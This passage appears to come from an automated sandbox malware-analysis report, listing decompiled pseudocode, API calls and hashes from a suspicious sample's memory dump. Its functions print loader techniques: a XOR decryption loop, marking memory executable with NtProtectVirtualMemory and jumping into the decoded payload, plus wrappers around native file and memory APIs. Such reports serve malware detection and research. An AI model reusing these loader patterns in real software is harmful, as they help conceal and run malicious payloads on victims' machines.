                                                                                                                          0x0040152e
                                                                                                                          0x00401535
                                                                                                                          0x0040153c
                                                                                                                          0x0040153e
                                                                                                                          0x00401545
                                                                                                                          0x0040154c
                                                                                                                          0x00401553
                                                                                                                          0x0040155a
                                                                                                                          0x0040156b
                                                                                                                          0x00401573
                                                                                                                          0x00401579
                                                                                                                          0x00401585
                                                                                                                          0x00401585
                                                                                                                          0x00401586
                                                                                                                          0x00401589
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_jaxdij.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                                          • String ID: "V;|
                                                                                                                          • API String ID: 2706961497-642726020
                                                                                                                          • Opcode ID: 789fe33001db3a1e386f85d58c9658997991dc80324abd6f1d04e40d6b7934d7
                                                                                                                          • Instruction ID: 5463cb51e55c2afdc302c68cbcf9c80f75f6798bf347080de531ad60d7095758
                                                                                                                          • Opcode Fuzzy Hash: 789fe33001db3a1e386f85d58c9658997991dc80324abd6f1d04e40d6b7934d7
                                                                                                                          • Instruction Fuzzy Hash: B88135B1C1076C9ADF10CFE4CC81AEEBBB4BF59304F20432AE515B7291EB7455868B95
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041E097 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memorynativeCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 27 41e097-41e0d4 call 41eb27 NtAllocateVirtualMemory
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0041E097(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, char _a28) {
				long _t14;

				E0041EB27( *((intOrPtr*)(_a4 + 0x14)), _a4, _t10 + 0xc84,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t4 =  &_a28; // 0x404448
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24,  *_t4); // executed
				return _t14;
			}




                                                                                                                          0x0041e0ae
                                                                                                                          0x0041e0b3
                                                                                                                          0x0041e0d0
                                                                                                                          0x0041e0d4

                                                                                                                          APIs
                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,HD@,00002000,00003000,00000004), ref: 0041E0D0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_jaxdij.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                          • String ID: HD@
                                                                                                                          • API String ID: 2167126740-1661062907
                                                                                                                          • Opcode ID: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
                                                                                                                          • Instruction ID: 618cacc9d955091c37b283641f352ee75933b55fd80a6a003cdf773a50a2a1f8
                                                                                                                          • Opcode Fuzzy Hash: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
                                                                                                                          • Instruction Fuzzy Hash: DFF015B6200219ABCB18DF89DC81EEB77ADAF88754F018109BE0997242C630F810CBB4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040C307 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 282 40c307-40c330 call 420857 285 40c332-40c335 282->285 286 40c336-40c344 call 420c77 282->286 289 40c354-40c365 call 41f0c7 286->289 290 40c346-40c351 call 420ef7 286->290 295 40c367-40c37b LdrLoadDll 289->295 296 40c37e-40c381 289->296 290->289 295->296
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040C307(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E00420857( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E00420C77(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E00420EF7( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041F0C7(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                                                          0x0040c323
                                                                                                                          0x0040c326
                                                                                                                          0x0040c32b
                                                                                                                          0x0040c330
                                                                                                                          0x0040c33a
                                                                                                                          0x0040c33f
                                                                                                                          0x0040c342
                                                                                                                          0x0040c344
                                                                                                                          0x0040c34c
                                                                                                                          0x0040c351
                                                                                                                          0x0040c351
                                                                                                                          0x0040c358
                                                                                                                          0x0040c360
                                                                                                                          0x0040c363
                                                                                                                          0x0040c365
                                                                                                                          0x0040c379
                                                                                                                          0x00000000
                                                                                                                          0x0040c37b
                                                                                                                          0x0040c381
                                                                                                                          0x0040c335
                                                                                                                          0x0040c335
                                                                                                                          0x0040c335

                                                                                                                          APIs
                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040C379
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_jaxdij.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Load
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2234796835-0
                                                                                                                          • Opcode ID: 095dae20bbe7988389fab9a1574e57fd5676e076113a6af895b2601c345a7319
                                                                                                                          • Instruction ID: 53b90dfa85ec64106e0678a0eab1c91a5987bb98c144bb09a81f5332de6f9a93
                                                                                                                          • Opcode Fuzzy Hash: 095dae20bbe7988389fab9a1574e57fd5676e076113a6af895b2601c345a7319
                                                                                                                          • Instruction Fuzzy Hash: 950112B5E4010DFBDB10DBE5DC42F9EB7B89F54304F0082A9AD08A7281F675EB588795
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004014E9 Relevance: 1.5, APIs: 1, Instructions: 48nativeCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 269 4014e9 270 4014f0-4014ff 269->270 271 401501-401504 270->271 272 401512-401519 270->272 271->272 273 401506-40150a 271->273 272->270 274 40151b 272->274 273->272 275 40150c-401510 273->275 276 40151e-401579 NtProtectVirtualMemory call 4016b0 call 422e97 274->276 275->272 277 401586-40158c 275->277 280 40157b-401585 276->280 277->276
                                                                                                                          C-Code - Quality: 58%
                                                                                                                          			E004014E9(void* __eax, void* __ebx, void* __ecx) {
				void* _t25;
				void* _t35;
				void* _t37;
				signed int _t39;
				void* _t41;
				void* _t43;

				_t37 = __ecx;
				_t35 = __ebx;
				_t25 = __eax;
				while(1) {
					_t39 =  *(_t37 + _t25) ^ 0x07a32715;
					 *(_t43 - 0x74) = _t39;
					if(_t39 == 0xa8 && _t39 == 0x8d &&  *((char*)(_t43 - 0x72)) == 0xdb &&  *((char*)(_t43 - 0x71)) == 0xcd) {
						break;
					}
					_t37 = _t37 + 1;
					if(_t37 < 0x4000) {
						continue;
					} else {
						_t41 =  *(_t43 - 0x44);
					}
					L7:
					 *(_t43 - 0x78) = 0;
					 *(_t43 - 0x7c) = 0x2ca00;
					NtProtectVirtualMemory(0xffffffff, _t43 - 0x44, _t43 - 0x7c, 0x40, _t43 - 0x78); // executed
					 *(_t43 - 0x40) =  *(_t43 - 0x40) ^ 0x07a32715;
					 *(_t43 - 0x3c) =  *(_t43 - 0x3c) ^ 0x07a32715;
					 *(_t43 - 0x38) =  *(_t43 - 0x38) ^ 0x07a32715;
					 *(_t43 - 0x34) =  *(_t43 - 0x34) ^ 0x07a32715;
					 *(_t43 - 0x30) =  *(_t43 - 0x30) ^ 0x07a32715;
					E004016B0(_t35, _t41, 0x2ca00, _t43 - 0x40);
					_t22 = _t41 + 0x21760; // 0x21760, executed
					 *_t22(); // executed
					return 0;
				}
				_t41 = _t37 + _t25;
				 *(_t43 - 0x44) = _t41;
				goto L7;
			}









                                                                                                                          0x004014e9
                                                                                                                          0x004014e9
                                                                                                                          0x004014e9
                                                                                                                          0x004014f0
                                                                                                                          0x004014f3
                                                                                                                          0x004014f9
                                                                                                                          0x004014ff
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00401512
                                                                                                                          0x00401519
                                                                                                                          0x00000000
                                                                                                                          0x0040151b
                                                                                                                          0x0040151b
                                                                                                                          0x0040151b
                                                                                                                          0x0040151e
                                                                                                                          0x0040152e
                                                                                                                          0x00401535
                                                                                                                          0x0040153c
                                                                                                                          0x0040153e
                                                                                                                          0x00401545
                                                                                                                          0x0040154c
                                                                                                                          0x00401553
                                                                                                                          0x0040155a
                                                                                                                          0x0040156b
                                                                                                                          0x00401573
                                                                                                                          0x00401579
                                                                                                                          0x00401585
                                                                                                                          0x00401585
                                                                                                                          0x00401586
                                                                                                                          0x00401589
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_jaxdij.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2706961497-0
                                                                                                                          • Opcode ID: 79962602b11d9ace138643dd5ef6a8fa319b27147e5f71a7e6e2a178e8370895
                                                                                                                          • Instruction ID: 3ad6c29875de01471cebc84a0c0c6c44ba3197564b47a2dc5fa5a75e38512274
                                                                                                                          • Opcode Fuzzy Hash: 79962602b11d9ace138643dd5ef6a8fa319b27147e5f71a7e6e2a178e8370895
                                                                                                                          • Instruction Fuzzy Hash: C61121B1C042586AEF28CEB4DC45ADEB774FF45364F24023EE921A72E1E33529458F45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041DF09 Relevance: 1.5, APIs: 1, Instructions: 47filenativeCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 297 41df09-41df10 298 41df12-41df15 297->298 299 41df65-41df7d 297->299 298->299 300 41df83-41dfb0 NtReadFile 299->300 301 41df7e call 41eb27 299->301 301->300
                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(00418997,00413C69,FFFFFFFF,00418481,00000206,?,00418997,00000206,00418481,FFFFFFFF,00413C69,00418997,00000206,00000000), ref: 0041DFAC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_jaxdij.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          • Opcode ID: 892b75dd5f743376a0ad4a43a1524eb44ee5575f8b77dbe96e1eff3b1ac21de6
                                                                                                                          • Instruction ID: 1233fab2ed96f2df4d540192bf7add0978d15b47aff4fc76818f86ce68861f8f
                                                                                                                          • Opcode Fuzzy Hash: 892b75dd5f743376a0ad4a43a1524eb44ee5575f8b77dbe96e1eff3b1ac21de6
                                                                                                                          • Instruction Fuzzy Hash: 65016DB2200104AFCB14DF99DC80EEB7BA9EF8C364F018219F91DA7251C630E902CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041DEB1 Relevance: 1.5, APIs: 1, Instructions: 43filenativeCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 302 41deb1-41df08 call 41eb27 NtCreateFile
                                                                                                                          C-Code - Quality: 44%
                                                                                                                          			E0041DEB1(long _a4, struct _EXCEPTION_RECORD _a8, struct _ERESOURCE_LITE _a12, struct _GUID _a16, long _a20, long _a24, long _a28, long _a32, void* _a36, long _a40) {
				HANDLE* _v0;
				intOrPtr _v4;
				long _t21;

				asm("bound ecx, [edi+0x7a]");
				_push(ds);
				asm("a16 push ebp");
				_push(_t34);
				_t15 = _v4;
				_t3 = _t15 + 0xc64; // 0xc64
				E0041EB27( *((intOrPtr*)(_v4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_v4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_v0, _a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t21;
			}






                                                                                                                          0x0041deb1
                                                                                                                          0x0041deb5
                                                                                                                          0x0041deb6
                                                                                                                          0x0041deb7
                                                                                                                          0x0041deba
                                                                                                                          0x0041dec6
                                                                                                                          0x0041dece
                                                                                                                          0x0041df04
                                                                                                                          0x0041df08

                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00000005,00000000,004187D3,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,004187D3,00000000,00000005,00000060,00000000,00000000), ref: 0041DF04
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_jaxdij.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 823142352-0
                                                                                                                          • Opcode ID: ce15daf798655d49dfd24b1c4014ba3ac982a536589b72ad83ce12e78e1cf900
                                                                                                                          • Instruction ID: ceb5497cd3cb3425bee1a9ea275faeed029dbafa86711658a48b717c305b6c28
                                                                                                                          • Opcode Fuzzy Hash: ce15daf798655d49dfd24b1c4014ba3ac982a536589b72ad83ce12e78e1cf900
                                                                                                                          • Instruction Fuzzy Hash: 6601AFB6205208BFCB08CF99DC85EEB77ADAF8C754F058208BA0997251C631F851CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041DEB7 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 305 41deb7-41decd 306 41ded3-41df08 NtCreateFile 305->306 307 41dece call 41eb27 305->307 307->306
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0041DEB7(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xc64; // 0xc64
				E0041EB27( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                                                                                          0x0041dec6
                                                                                                                          0x0041dece
                                                                                                                          0x0041df04
                                                                                                                          0x0041df08

                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00000005,00000000,004187D3,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,004187D3,00000000,00000005,00000060,00000000,00000000), ref: 0041DF04
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_jaxdij.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 823142352-0
                                                                                                                          • Opcode ID: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                                                                                                                          • Instruction ID: c0286b2864f0c35431545fb634747f2496e329dba7df57a784a8bffd1e9d319f
                                                                                                                          • Opcode Fuzzy Hash: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                                                                                                                          • Instruction Fuzzy Hash: B7F0CFB2204208AFCB08CF89DC85EEB37EDAF8C754F018208BA0D97241C630F851CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041DFE1 Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 308 41dfe1-41dfe6 309 41dfe8-41e010 call 41eb27 NtClose 308->309 310 41e03d-41e054 308->310
                                                                                                                          C-Code - Quality: 53%
                                                                                                                          			E0041DFE1(void* __eax, void* __edx, void* _a4) {
				intOrPtr _v0;
				long _t9;

				asm("out dx, al");
				asm("cli");
				asm("loopne 0x57");
				_t6 = _v0;
				_t3 = _t6 + 0xc74; // 0xc79
				E0041EB27( *((intOrPtr*)(_v0 + 0x14)), _t6, _t3,  *((intOrPtr*)(_v0 + 0x14)), 0, 0x2c);
				_t9 = NtClose(_a4); // executed
				return _t9;
			}





                                                                                                                          0x0041dfe1
                                                                                                                          0x0041dfe5
                                                                                                                          0x0041dfe6
                                                                                                                          0x0041dfea
                                                                                                                          0x0041dff6
                                                                                                                          0x0041dffe
                                                                                                                          0x0041e00c
                                                                                                                          0x0041e010

                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(00418975,00000206,?,00418975,00000005,FFFFFFFF), ref: 0041E00C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_jaxdij.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          • Opcode ID: d6e8ae3c206c6f190670d46ae4e1686ecdf9884ddc5ae9faafa64a69e14905dd
                                                                                                                          • Instruction ID: 2e90bb1ee69db0c3d595c5722922874e3690d9047817fe8907a14d918bab6f8d
                                                                                                                          • Opcode Fuzzy Hash: d6e8ae3c206c6f190670d46ae4e1686ecdf9884ddc5ae9faafa64a69e14905dd
                                                                                                                          • Instruction Fuzzy Hash: 19F03AB6204114ABD714EF99EC84EE777ADEF88350F10855AFE1C9B201C631E9148BA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041DF61 Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 314 41df61-41dfb0 call 41eb27 NtReadFile
                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(00418997,00413C69,FFFFFFFF,00418481,00000206,?,00418997,00000206,00418481,FFFFFFFF,00413C69,00418997,00000206,00000000), ref: 0041DFAC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_jaxdij.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          • Opcode ID: 6f2704391b32f7f26726139c8ae281211cb4323cc21130cef161d7f73a6382ae
                                                                                                                          • Instruction ID: 8418693cf7761339d28f09e3fe57223cd8bc2ab177a282d5e6cbd50b19ddda83
                                                                                                                          • Opcode Fuzzy Hash: 6f2704391b32f7f26726139c8ae281211cb4323cc21130cef161d7f73a6382ae
                                                                                                                          • Instruction Fuzzy Hash: F5F0F4B6200108ABCB14DF99DC84EEB77A9EF8C314F018249FE4E97241DA30F811CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041DF67 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 317 41df67-41df7d 318 41df83-41dfb0 NtReadFile 317->318 319 41df7e call 41eb27 317->319 319->318
                                                                                                                          C-Code - Quality: 37%
                                                                                                                          			E0041DF67(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t3 = _a4 + 0xc6c; // 0xe72
				_t27 = _t3;
				E0041EB27( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}





                                                                                                                          0x0041df76
                                                                                                                          0x0041df76
                                                                                                                          0x0041df7e
                                                                                                                          0x0041dfac
                                                                                                                          0x0041dfb0

                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(00418997,00413C69,FFFFFFFF,00418481,00000206,?,00418997,00000206,00418481,FFFFFFFF,00413C69,00418997,00000206,00000000), ref: 0041DFAC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_jaxdij.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          • Opcode ID: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                                                                                                                          • Instruction ID: 32b046dcbb71cb4e6359c6725ba47d80c1c5cab5c032eea9b29b0e9906148c6b
                                                                                                                          • Opcode Fuzzy Hash: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                                                                                                                          • Instruction Fuzzy Hash: BCF0AFB6200208ABCB14DF89DC85EEB77ADAF8C754F118249BE0DA7241D630F811CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041DFE7 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0041DFE7(intOrPtr _a4, void* _a8) {
				long _t8;

				_t3 = _a4 + 0xc74; // 0xc79
				E0041EB27( *((intOrPtr*)(_a4 + 0x14)), _t5, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                                                                                          0x0041dff6
                                                                                                                          0x0041dffe
                                                                                                                          0x0041e00c
                                                                                                                          0x0041e010

                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(00418975,00000206,?,00418975,00000005,FFFFFFFF), ref: 0041E00C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_jaxdij.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          • Opcode ID: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                                                                                                                          • Instruction ID: 51f7b19349b25f870e13c14fb46d1f84fc665ab1cf3978e02f270bc9d52711b0
                                                                                                                          • Opcode Fuzzy Hash: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                                                                                                                          • Instruction Fuzzy Hash: 97D01776204214ABD614EFA9DC89ED77BACDF48664F014155BA0D5B242C630FA00CBE4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00408D67 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 254 408d67-408db1 call 41fb17 call 420607 call 40c307 call 418a77 263 408db3-408dc5 PostThreadMessageW 254->263 264 408de5-408de9 254->264 265 408de4 263->265 266 408dc7-408de1 call 40ba67 263->266 265->264 266->265
                                                                                                                          C-Code - Quality: 82%
                                                                                                                          			E00408D67(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041FB17( &_v67, 0, 0x3f);
				E00420607( &_v68, 3);
				_t12 = E0040C307(_t30, _a4 + 0x20,  &_v68); // executed
				_t13 = E00418A77(_a4 + 0x20, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040BA67(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                                                                          0x00408d67
                                                                                                                          0x00408d76
                                                                                                                          0x00408d7a
                                                                                                                          0x00408d85
                                                                                                                          0x00408d95
                                                                                                                          0x00408da5
                                                                                                                          0x00408daa
                                                                                                                          0x00408db1
                                                                                                                          0x00408db4
                                                                                                                          0x00408dc1
                                                                                                                          0x00408dc3
                                                                                                                          0x00408dc5
                                                                                                                          0x00408de2
                                                                                                                          0x00408de2
                                                                                                                          0x00000000
                                                                                                                          0x00408de4
                                                                                                                          0x00408de9

                                                                                                                          APIs
                                                                                                                          • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 00408DC1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_2_2_400000_jaxdij.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePostThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1836367815-0
                                                                                                                          • Opcode ID: 491cf65712756ec38b940ff3ad6ee92a1750f631df254e6407a5987465c099ad
                                                                                                                          • Instruction ID: 6dab6d9b567fee0c22e3893300c05364e4ed2aeeddae925e6573d7ec1a28d4a4
                                                                                                                          • Opcode Fuzzy Hash: 491cf65712756ec38b940ff3ad6ee92a1750f631df254e6407a5987465c099ad
                                                                                                                          • Instruction Fuzzy Hash: B801A731A8022877E720A6959C43FFE776C9F40B59F14412EFF04BA1C1EAA8790647E9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041E1BB Relevance: 1.5, APIs: 1, Instructions: 25memoryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 320 41e1bb-41e1db 321 41e1e3-41e1f8 RtlFreeHeap 320->321 322 41e1de call 41eb27 320->322 322->321
